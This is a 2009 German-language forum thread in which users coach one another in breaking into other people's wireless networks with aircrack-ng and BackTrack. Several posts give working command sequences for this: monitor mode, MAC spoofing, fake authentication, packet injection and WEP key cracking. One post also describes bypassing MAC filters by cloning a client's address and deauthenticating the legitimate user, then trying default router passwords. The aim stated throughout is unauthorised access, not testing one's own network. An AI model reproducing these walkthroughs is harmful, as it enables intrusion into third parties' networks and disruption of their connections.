W-LAN Hack feat Aircrack

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von $-K!NG, 19. Mai 2009 .

  1. 19. Mai 2009
    Hey Leute, kennt sich jemand mit Aircrack aus? Habe nun das komplette Internet durchsucht und es gibr nirgends ne vernünftige Anleitung.
    Ich habe das Programm sowohl für Windows, als auch für Linux, in der Version 1.0 rc3
    Betriebssysteme:
    Windows Vista Home Premium
    Linux (über VMware) Ubuntu 9.04

    Mein Notebook hat eine Intel 4965AGN W-LAN Karte drinne.
    So, nun meine Frage, weiß jemand, wie ich die Treiber, die Monitoring unterstützen unter Linux zum Laufen kriege? Bin nicht so der Freund von Linux. Gibt es vll. ein Linux, welches schon vorkonfiguriert fürs "Hacken" ist? Sprich mit den notwendigen Treibern und Programmen?

    Und zum Anderen, unter Windows, popt beim ersten Schritt: Airdump, nur ein Dos-Fenster kurz auf und wieder zu.

    Kennt jemand vielleicht allternativen oder einen W-LAN-Stick, welcher einen Atheros Chipsatz hat?
     
  2. 19. Mai 2009
    AW: W-LAN Hack feat Aircrack

    Hallo, also deine Karte funktioniert im Monitor Mode und man kann sogar Paket injecten, das macht nicht jeder oder besser gesagt die wenigstens.

    Karte: http://backtrack.offensive-security.com/index.php?title=HCL:Wireless#IPW4965.2FIWL4965_agn

    Als Betriebssystem kann ich nur Backtrack und da die Version 3 empfehlen.

    http://www.remote-exploit.org/backtrack_download.html

    Als Grobanleitung kann ich nur sagen man snifft erstmal Pakete bzw. Injectet und snifft. Nachdem man eine gewisse Grundanzahl an Pakete mitgenschnitten hat kann man mit verschiedenen Attacken sein Glück versuchen. Bruteforce, Leak Wpe, etc etc .


    Alternative manche Wlankarten kann man sogar unter Windows zum Monitor Mode überreden und es gibt auch eine WIndowsversion von Aircrack. Dazu installiert man den entsprechenden Treiber von Wildpeek und ruft das Aircrackprogramm auf. DIeses greift auf die WIldpeektreiber zu und setzt die Karte im Monitor-Mode. Beide Varianten hatte ich getestet. Du musst nur schauen ob Wildpeek deine Karte unterstüzt.

    Mfg Bloody


    Edit: Hier noch ein Tut was ich auf die schnelle gefunden habe. Allerdings habe ich das nicht durchgelesen. http://www.wardriving-forum.de/forum/showthread.php?t=58568
     
  3. 19. Mai 2009
    AW: W-LAN Hack feat Aircrack

    naja die Version 4 is auch schon ganz gut..... (einfach unter google.de backtrack eintippen)

    -starte die vm version unter vmware
    -login root pw toor
    -dann musste ne shell konsole öffnen (unten links ist ein kleines schwarzes fenster)

    dann tippst du ein:

    airmon-ng
    airmon-ng start mon0 (mon0 ist bei mir musst mal bei dir schauen)
    airodump-ng mon0

    so dann schauste ob de ein wep netz findest....wenn ja haste glück
     
  4. 19. Mai 2009
    AW: W-LAN Hack feat Aircrack

    Vielen Dank! BW ist raus, ich probier es mal mit Blacktrack 3 aus.
    Sind dort die W-LAN Treiber mit integriert? Habe im ersten Link gelesen, dass die auf gelisteten Treiber schon vorhanden sind... ?
    Könntest du vll. eine genauere Anleitung schreiben, welche Programme du benutzt hattest?
    Habe nach den Wildpeek treibern gesucht, leider keine Gefunden. Gibt es anscheinend nicht... muss es dann wohl doch mit Linux probieren.
     
  5. 28. Mai 2009
    AW: W-LAN Hack feat Aircrack

    So, habe nun mit Backtrack einen WEP-Schlüssel erhalten ^^ hat endlich geklappt. Zwar erst mit der BK4Beta version, aber es hat geklappt.
    So, das nächste problem ist nur, dass ich keinen Schimmer habe, wie ich den Hex-Key, Linux beibringen soll.
    Wie konfiguriert man seine W-Lan Karte, mit einem WEP-Key oder WPA-PSK-Key?
     
  6. 28. Mai 2009
    AW: W-LAN Hack feat Aircrack

    Wenn du dich mit nem WEP-verschlüsseltem Netz verbinden willst, kannst du das mit iwconfig machen.

    Einfach:

    iwconfig WLANINTERFACE key DEINWEPHEXKEY
    iwconfig WLANINTERFACE essid APNAME
    dhclient WLANINTERFACE

    oder

    iwconfig WLANINTERFACE key s EINWEPKEY
    iwconfig WLANINTERFACE essid APNAME
    dhclient WLANINTERFACE

    Wenn du dich mit einem WPA-verschlüsseltem WLAN verbinden willst musst du das über wpasupplicant machen.
    Musst da ne .config-Datei Anpassen, wie das aber genau geht kann ich dir zzT. nicht sagen.
    Lies dir einfach durch was

    man wpasupplicant

    zu sagen hat.

    //EDIT:

    das da oben beim smiley soll s doppelpunkt DEINWEPKEY sein
     
  7. 29. Mai 2009
    AW: W-LAN Hack feat Aircrack

    hi

    kan dir für das vorhaben auch nur backtrack empfehlen.

    hab das auch ina vm laufen. hab mir auf youtube en tut angeguckt (einfach mal wep bei yt eingeben) und nach ca. 10 mins wurd mir das pw angezeigt. habs dan noch 2 mal gemacht mitlerweile brauch ich keine 5 minuten mehr.

    wen du irgentwo hängst meld dich
     
  8. 2. Juni 2009
    AW: W-LAN Hack feat Aircrack

    Hab mir auch mittlerweile unzählige Tutorials angeschaut und runtergeladen. Ansich geht es total einfach, besonders, wenn man Glück hat und 3 Clients am W-Lan hängen, die ordentlich Traffic erzeugen. Dann läuft der Laden richtig. Leider ist ein WPA Schlüssel kaum hackbar, esseiden man hat eine sehr umfangreiche Password.lst.
    Kann man irgendwie herauskriegen, ob jemand einen Mac-Filter drinne hat? Ist das mit BackTrack möglich? Nutze BT4Beta.

    Sooo, nun, ist hier eine kleine Anleitung, wie man einen WEP-Key herausfinden kann:
    Die Befehle werden in die Konsole eingegeben:

    airmon-ng /mit diesem Befehl kann man sich seine W-Lan Karte auflisten lassen, dammit man den Namen hat, welcher unter "Interface" aufgelistet wird.
    Die Klammern () weg lassen. Das sind nur Hinweise!

    1)airmon-ng stop (Name des W-Lanadapters z.B. wlan0 oder eth0 oder ath0)
    Als Ausgabe folgt, dass der Monitoring mode disabled ist.

    2)ifconfig (wlan0) down
    Keine Bestätigende Ausgabe.

    3)macchanger --mac 00:11:22:33:44:55 (wlan0)
    Ausgabe: Current Mac: xx:xx:xx:xx:xx:xx
    Faked Mac: 11:22:33:44:55

    4)airmon-ng start (wlan0)
    Als Ausgabe folgt nun, dass der Monitoring mode enable ist.

    5)airodump-ng (wlan0)
    Diesen Schritt kann man überspringen, wenn man die BSSID (Eindeutige Kennung des W-LAN Routers, mit anderen Worten die Mac-Adresse ^^) und den Kanal des zu hackenden kennt. Mit diesem Befehl werden alle Netzwerke aufgelistet, die ihr finden könnt.
    Wenn ihr nun ein Netz euch ausgesucht habt, schreibt euch am Besten die BSSID und den Kanal auf. Die sind wichtig!

    6)airodump-ng -c (channel) -w (file name, kann z.B. "test" heißen) --bssid (bssid) (wlan0)
    Neue Konsolle öffnen: Die alte NICHT schließen!

    7)aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
    Für diesen Angriff, muss eure W-Lan Karte Injection Modus unterstützen.
    Als Bestätigung, für den Erfolg, kommt association successful
    in die selbe Konsole wird dann:

    8.)aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
    eingegeben, wo er ständig Packete zum Router schickt, was sich positiv auf den Datentransfaire auswirkt. Nun kann man, wenn man mind. 100.000 pakete hat, Aircrack auf den Schlüssel ansetzen.
    Beide Konsolen offen halten und eine neue, 3. Konsole öffnen.

    9)aircrack-ng -b (bssid) (filename-01.cap z.B. "test", der Name den man vorhin gewält hatte,mit-01.capdahinter.)

    Das wars auch schon ^^ so schwer ist das nicht. Man benötigt lediglich die richtige Hardware und etwas Zeit. Wenn man Pech hat, braucht man mehr als 1mil. Datenpackete.

    Eine Ausführliche Liste von W-Lan adaptern, die kompatibel sind, findet ihr hier:
    http://backtrack.offensive-security.com/index.php/HCL:Wireless

    Ansonsten ist hier noch mal eine Anleitung, mit Bildern:
    Anleitung: WEP WLAN cracken mit Backtrack BootCD 3 - WLAN / Router Forum
    Und hier mit Video:
    Crack wep with backtrack 3 - YouTube

    Viel Spaß beim Hacken, probiert etwas aus, liest euch paar Tutorials, so schwer ist es nicht. Wo ein Wille ist, ist auch ein Weg

    Für den Angriff auf ein WPA oder WPA2 Netzwerk, benötigt man eine Wortliste, da sich der Schlüssel nicht aus den eingefangen Daten generieren lässt.
     
  9. 2. Juni 2009
    AW: W-LAN Hack feat Aircrack

    Siehst du, so schwer ist das nicht, und Tutorials dazu gibts wie Sand am Meer...

    Ja, es ist möglich, sowohl unter BT3, als auch unter BT4beta.

    Undzwar wirkt sich das so aus, dass man kein "Association Successful" bekommt, bei deinem Punkt 7 bzw. 8

    Um das zu umgehen, kannst du den Traffic sniffen, solange bis ein Client mit einer "gültigen" MAC-Adresse verbindet und diese "merken".

    Anschliessend imitierst du seine MAC-Adresse mithilfe von macchanger, wie das geht weisst du ja.

    Darauf kickst du den Mistkerl aus seinem eigenem Netz mit

    aireplay-ng -0 50 -a MAC-DES-AP –c MAC-DES-CLIENTS (wlan0)

    oder du benutzt mdk3....

    Wobei bei dem oberen Befehl 50 DeAuthentication-Pakete an den AP gesendet werden, wodurch der Client gekickt wird.

    Jetzt kannst du mit "seiner" MAC-Adresse connecten.


    Dann kannst du allerlei lustiger Sachen machen, ua. auch einfach auf das Web-Interface des Routers zugreifen, falls mit einem Passwort versehen, die Default-Passwörter durchgehen oder selber bisschen rumprobieren, und dann den MAC-Filter einfach ausschalten.
     
  10. 2. Juni 2009
    AW: W-LAN Hack feat Aircrack

    Du bist ein Genie! :-* Danke! Nun hat mein Tag wieder einen Sinn Damn, wieso bin ich da noch nicht drauf gekommen?
    Ist es auch möglich, wenn der nen Mac-Filter drinne hat und kein client angemeldet ist, so an Association Successful heran zu kommen?
    Bewertung ist für dich raus, anscheinend hast du mehr Erfahrung, könntest du evtl. ein vernünftiges Tut. schreiben? Für die Anderen Leute, die es auch mal gerne Testen würden?
     
  11. 2. Juni 2009
    AW: W-LAN Hack feat Aircrack

    Danke

    Zzt. ist mir aber keine Methode bekannt ohne Clients / einer bekannte MAC-Adresse um die MAC-Filterung zu kommen.

    Ausser, und natürlich wie immer.... mit Bruteforce....

    Mir ist jetzt kein Programm bekannt, dass sowas macht, ausser MDK3, ich meine das hatte eine Funktion um den MAC-Filter zu bruten, hat aber eine verdammte ewigkeit gedauert, und ist praktisch unmöglich.

    Ist auch leider nicht so ne Sache wie mit dem WPA-Key, dass man den irgentwie snifft und dann zu Hause über GPU crackt, das würde vor Ort gemacht und ist eigentlich unschaffbar, also da bist du schneller drin, wenn du auf nen Client wartest.

    Tut mir leid,
    aber ein Tutorial übers WEP/WPA/bzw. WLAN-Hacken generell hab ich keine Lust, da schwirren unzählige im Internet rum, manche mit Bildern, manche mit Videos, da kann man auch nicht viel falsch machen.

    Eine gute Anlaufstelle ist das, bereits oben erwähnte, remote-exploit-board, sonst einfach mal googlen, gibt wirklich zig Seiten darüber.

    //EDIT:

    Lese grade von WEPBuster, ein Perl-Script für die aircrack-ng Suite das automatisch alle in der Nähe befindlichen WEP-Netze "hackt"...
    ...da werden sich die Script-Kiddies freuen
     
  12. 3. Juni 2009
    AW: W-LAN Hack feat Aircrack

    Nicht schlecht, anscheinend ist das Programm ja richtig nett. Hab ich mir eigentlich vor 3 Tagen auch gedacht, wieso nicht jemand mal so'n Programm schreibt, welches einfach alles von alleine macht.
    Ich mein auch, dass die Leute selbst Schuld haben, die noch WEP schlüssel benutzten!
    Ok, das mit dem Tutorial, da muss ich dir aber auch Recht geben. Da gibt es echt genug Stuff, wo man sich auch als Neuling reinlesen kann.
    Danke für deine kooperative Zuarbeit.
     
  13. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.